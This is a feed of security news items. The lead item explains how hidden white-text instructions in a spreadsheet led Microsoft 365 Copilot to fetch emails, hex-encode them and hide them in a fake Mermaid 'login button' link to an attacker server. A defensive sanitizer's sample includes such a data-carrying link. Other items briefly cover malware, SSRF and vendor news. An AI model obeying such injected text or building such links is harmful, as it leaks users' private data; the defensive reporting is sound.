• A sophisticated vulnerability in Microsoft 365 Copilot (M365 Copilot) allows attackers to steal sensitive tenant data, including recent emails, through indirect prompt injection attacks.

    The flaw, detailed in a blog post published today by researcher Adam Logue, exploits the AI assistant’s integration with Office documents and its built-in support for Mermaid diagrams, enabling data exfiltration without direct user interaction beyond an initial click.

    The attack begins when a user asks M365 Copilot to summarize a maliciously crafted Excel spreadsheet. Hidden instructions, embedded in white text across multiple sheets, use progressive task modification and nested commands to hijack the AI’s behavior.

    These indirect prompts override the summarization task, directing Copilot to invoke its search_enterprise_emails tool to retrieve recent corporate emails. The fetched content is then hex-encoded and fragmented into short lines to bypass Mermaid’s character limits.

    Microsoft 365 Copilot Data Exfiltration Via Deceptive Diagrams

    Copilot generates a Mermaid diagram that masquerades as a “login button” secured with a lock emoji. Mermaid is a JavaScript-based tool for creating flowcharts and charts from Markdown-like text.

    The diagram includes CSS styling for a convincing button appearance and a hyperlink embedding the encoded email data.

    When the user clicks it, believing it’s needed to access the document’s “sensitive” content, the link directs to the attacker’s server, such as a Burp Collaborator instance. The hex-encoded payload is transmitted silently and can then be decoded from the server logs.

    Mermaid’s flexibility, including CSS support for hyperlinks, made this vector particularly insidious. Unlike direct prompt injection, where attackers converse with the AI, this method hides commands in benign files like emails or PDFs, making it stealthy for phishing campaigns.

    Adam Logue noted similarities to a prior Mermaid exploit in Cursor IDE, which enabled zero-click exfiltration via remote images, though M365 Copilot required user interaction.

    The payload, arrived at after extensive testing, was inspired by Microsoft’s TaskTracker research on detecting “task drift” in LLMs. Despite initial challenges reproducing the issue, Microsoft validated the chain and patched it by September 2025, removing interactive hyperlinks from Copilot’s rendered Mermaid diagrams.

    The discovery timeline shows that there were challenges in coordination. Adam Logue reported the complete situation on August 15, 2025, after discussions with the Microsoft Security Response Center (MSRC) staff at DEFCON.

    After iterations, including video proofs, MSRC confirmed the vulnerability on September 8 and resolved it by September 26. However, M365 Copilot fell outside the bounty scope, so no reward was paid.

    This incident underscores risks in AI tool integrations, especially for enterprise environments handling sensitive data. As LLMs like Copilot connect to APIs and internal resources, defenses against indirect injections remain critical.

    Microsoft emphasized ongoing mitigations, but experts urge users to verify document sources and monitor AI outputs closely.
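
    The fix described above (no interactive hyperlinks in rendered Mermaid output) can be approximated in any pipeline that renders LLM-generated diagrams. The JavaScript below is an added example, not code from Microsoft or from the researcher's post; the function name, the 24-character hex threshold and the sample diagram are assumptions constructed for illustration.

```javascript
// Added example: strip interactive links from LLM-generated Mermaid source
// before it is rendered, and report links that look like encoded data carriers.
// Names and thresholds are assumptions, not Microsoft's implementation.

const URL_RE = /https?:\/\/[^\s"'<>)]+/gi;
const HEX_RUN_RE = /[0-9a-f]{24,}/i;              // assumed "looks hex-encoded" threshold
const CLICK_RE = /^\s*click\s+[\w-]+\s+\S/i;      // any Mermaid click directive on a node
const ANCHOR_RE = /<a\b[^>]*>([\s\S]*?)<\/a>/gi;  // HTML anchors inside node labels

function sanitizeMermaid(source) {
  const findings = [];
  const kept = [];
  source.split(/\r?\n/).forEach((line, idx) => {
    // Record every URL for the audit log, with a flag for long hex runs.
    for (const url of line.match(URL_RE) || []) {
      findings.push({ line: idx + 1, url, hexPayload: HEX_RUN_RE.test(url) });
    }
    // Click directives make a node interactive: drop the whole line.
    if (CLICK_RE.test(line)) return;
    // Keep the visible label text, remove the anchor element and any bare URL.
    kept.push(line.replace(ANCHOR_RE, "$1").replace(URL_RE, "[link removed]"));
  });
  return { sanitized: kept.join("\n"), findings };
}

// Constructed sample: a "login button" node whose link carries a hex string,
// plus an ordinary help link. Hosts use the reserved .example TLD.
const sample = [
  "flowchart TD",
  '  A["🔒 Login to view document"]',
  '  click A href "https://collector.example/a?d=48656c6c6f2c20746869732069732061207465737421"',
  '  B["See <a href=\'https://docs.example/help\'>help</a>"]',
  "  style A fill:#0a66c2,color:#fff",
].join("\n");

const result = sanitizeMermaid(sample);
for (const f of result.findings) {
  console.log(`line ${f.line}: ${f.hexPayload ? "HEX PAYLOAD" : "link"} ${f.url}`);
}
console.log(result.sanitized);
```

    Findings with `hexPayload` set are worth alerting on even when the link is stripped, since they indicate the model output was steered by injected instructions.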

    The post Microsoft 365 Copilot Prompt Injection Vulnerability Allows Attackers to Exfiltrate Sensitive Data appeared first on Cyber Security News.

  • Cybersecurity researchers have shed light on the inner workings of a botnet malware called PolarEdge. PolarEdge was first documented by Sekoia in February 2025, attributing it to a campaign targeting routers from Cisco, ASUS, QNAP, and Synology with the goal of corralling them into a network for an as-yet-undetermined purpose. The TLS-based ELF implant, at its core, is designed to monitor

  •  A vulnerability in Microsoft 365 Copilot allowed attackers to trick the AI assistant into fetching and exfiltrating sensitive tenant data by hiding instructions in a document. The AI then encoded the data into a malicious Mermaid diagram that, when clicked, sent the stolen information to an attacker’s server. When Microsoft 365 Copilot was asked to […]

    The post Microsoft 365 Copilot Flaw Lets Hackers Steal Sensitive Data via Indirect Prompt Injection appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Wilmington, Delaware, October 21st, 2025, CyberNewsWire

    Sendmarc has announced the appointment of Dan Levinson as Customer Success Director – North America, furthering the company’s regional expansion and commitment to providing expert, locally aligned support to organizations across the continent.

    Levinson will lead the development of customer success programs that help businesses strengthen their email security and achieve full compliance with Domain-based Message Authentication, Reporting, and Conformance (DMARC). 

    With over 15 years of experience spanning email security, email deliverability, account management, product management, and leadership, Levinson brings deep expertise in implementing and managing email authentication protocols, including Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and DMARC.

    He has helped organizations apply these standards effectively to reduce impersonation risks and improve deliverability. His work has also driven measurable operational improvements, including a 25% reduction in support cases during a period of 20% year-over-year customer growth. 

    In his new role, Levinson will focus on building a customer success team designed to provide responsive, expert-level support to Sendmarc’s North American clients.

    His team will work closely with customers to strengthen the adoption of DMARC and related standards, enabling advanced protection and improved visibility across their email environments. 

    “Joining Sendmarc has allowed me to continue an incredibly rewarding career in cybersecurity. The position affords me an opportunity to remain on the front lines, engaging directly with customers, as well as draw on my leadership experience to build a high-performing team to expand our North American presence,” said Levinson.

    “Sendmarc has built every capability modern DMARC users expect, without compromising on standards or email deliverability best practices that are often overlooked by other providers in the space. What I’m most impressed with, though, is the dedication and subject matter expertise across the global customer success team. Most team members have had successful careers in other areas of cybersecurity, which strengthens the care and support our customers receive. I honestly couldn’t ask for more when I consider the capabilities and sophistication of the platform, the dedicated staff, and the incredibly trusting leadership group here. Sendmarc is the DMARC solution that the North American market should be very excited about.” 

    Rob Bowker, North America Region Lead at Sendmarc, commented: “The DMARC space is crowded with a lot of noise, but every now and then, you find the people who cut through it.

    I’ve had the good fortune of working alongside Dan not once, but twice – and this time, we’re doing it with the right platform and the right leadership. I’m very excited about this second chance to get it right.” 

    About Sendmarc  

    Sendmarc is a global leader in safeguarding email communications through DMARC. Built with a partner-first approach, its platform empowers MSPs and VARs to deliver trusted protection against impersonation, phishing, and other email-based threats.

    In addition to preventing fraud, Sendmarc improves email deliverability, ensuring legitimate business communications reach their intended recipients.

    Trusted by enterprises and partners worldwide, Sendmarc provides the tools and expertise needed to help customers achieve full DMARC compliance quickly and effectively. 

    Contacts

    North America Customer Success Director
    Dan Levinson
    Sendmarc
    dan.levinson@sendmarc.com

    North America Region Lead
    Rob Bowker
    Sendmarc
    rob.bowker@sendmarc.com

    The post Sendmarc appoints Dan Levinson as Customer Success Director in North America appeared first on Cyber Security News.

  • A sophisticated cyberespionage campaign dubbed PassiveNeuron has emerged from the shadows after months of dormancy, with security researchers uncovering fresh details about its operations and attack methods. The campaign, first detected in June 2024, has resurfaced with renewed vigor, targeting government, financial and industrial organizations across Asia, Africa and Latin America with previously unknown malware […]

    The post PassiveNeuron Targets High-Profile Servers to Deploy Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Wilmington, Delaware, October 21st, 2025, CyberNewsWire Sendmarc has announced the appointment of Dan Levinson as Customer Success Director – North America, furthering the company’s regional expansion and commitment to providing expert, locally aligned support to organizations across the continent. Levinson will lead the development of customer success programs that help businesses strengthen their email security […]

    The post Sendmarc appoints Dan Levinson as Customer Success Director in North America appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • CISA has issued an urgent alert about a critical server-side request forgery (SSRF) vulnerability in Oracle E-Business Suite, now actively exploited by threat actors.

    Tracked as CVE-2025-61884, the flaw affects the Runtime component of Oracle Configurator and allows remote attackers to forge requests without authentication, potentially leading to unauthorized access and data exfiltration.

    This vulnerability, rated with a high severity score under CVSS 3.1, stems from inadequate input validation that enables attackers to manipulate server requests to internal or external resources.

    As organizations rely heavily on Oracle E-Business Suite for enterprise resource planning (ERP), the risks are amplified in sectors like finance, manufacturing, and government, where sensitive data flows through these systems.

    Exploitation Tactics And Real-World Impact

    CISA’s Known Exploited Vulnerabilities (KEV) catalog added CVE-2025-61884 after evidence emerged of active exploitation in the wild.

    Attackers can leverage SSRF to scan internal networks, bypass firewalls, and interact with cloud metadata services, often as a stepping stone for broader intrusions.

    While direct ties to ransomware campaigns remain unconfirmed, security researchers note similarities to tactics used in recent supply chain attacks, where SSRF flaws have facilitated lateral movement.

    Oracle patched the issue in its October 2025 Critical Patch Update, but unpatched systems remain prime targets.

    Early reports indicate exploitation attempts targeting outdated E-Business Suite installations in the Asia-Pacific region, with potential for widespread compromise if organizations delay remediation.

    The flaw aligns with CWE-918, a common SSRF weakness that has plagued enterprise software for years.

    Mitigations

    CISA urges immediate action: apply Oracle’s vendor-provided patches or mitigations, such as network segmentation and web application firewalls (WAFs) tuned to block anomalous requests.

    For cloud-hosted instances, adhere to Binding Operational Directive (BOD) 22-01, which mandates vulnerability management in federal systems.

    If mitigations prove infeasible, CISA advises discontinuing use of affected products to avoid exposure. Experts emphasize proactive monitoring, including logging SSRF indicators like unexpected outbound traffic.

    Organizations should scan their networks for vulnerabilities using tools like Nessus or OpenVAS and review access logs for signs of exploitation.

    The post CISA Warns Of Oracle E-Business Suite SSRF Vulnerability Actively Exploited In Attacks appeared first on Cyber Security News.

  • Luma Infostealer, a malware-as-a-service (MaaS) offering, has emerged as a potent threat targeting high-value credentials such as web browser cookies, cryptocurrency wallets, and VPN/RDP account information. Beyond isolated theft, threat actors are employing Luma in the initial infiltration stages of complex campaigns—ransomware deployment, account hijacking, and internal network compromise. The stolen data fuels identity theft, […]

    The post New Luma Infostealer Malware Steals Browser Data, Cryptocurrency, and Remote Access Accounts appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Understanding exactly how users authenticate to cloud services is crucial for effective security monitoring. A recently refined bitfield mapping technique decodes the opaque UserAuthenticationMethod values in Microsoft 365 audit logs, transforming numeric codes into actionable, human-readable descriptions. This breakthrough empowers incident responders to identify primary authentication methods even when only Microsoft 365 audit logs are […]

    The post Decoding Microsoft 365 Audit Logs Using Bitfield Mapping: An Investigation Report appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Apache Syncope has disclosed a critical security vulnerability that allows authenticated administrators to execute arbitrary code on affected systems. The flaw, tracked as CVE-2025-57738, impacts all Apache Syncope versions 3.x before 3.0.14 and 4.x before 4.0.2, exposing organisations to potential system compromise through malicious Groovy code injection. Vulnerability Details and Attack Mechanism: The vulnerability exists […]

    The post Apache Syncope Groovy Flaw Allows Remote Code Injection appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
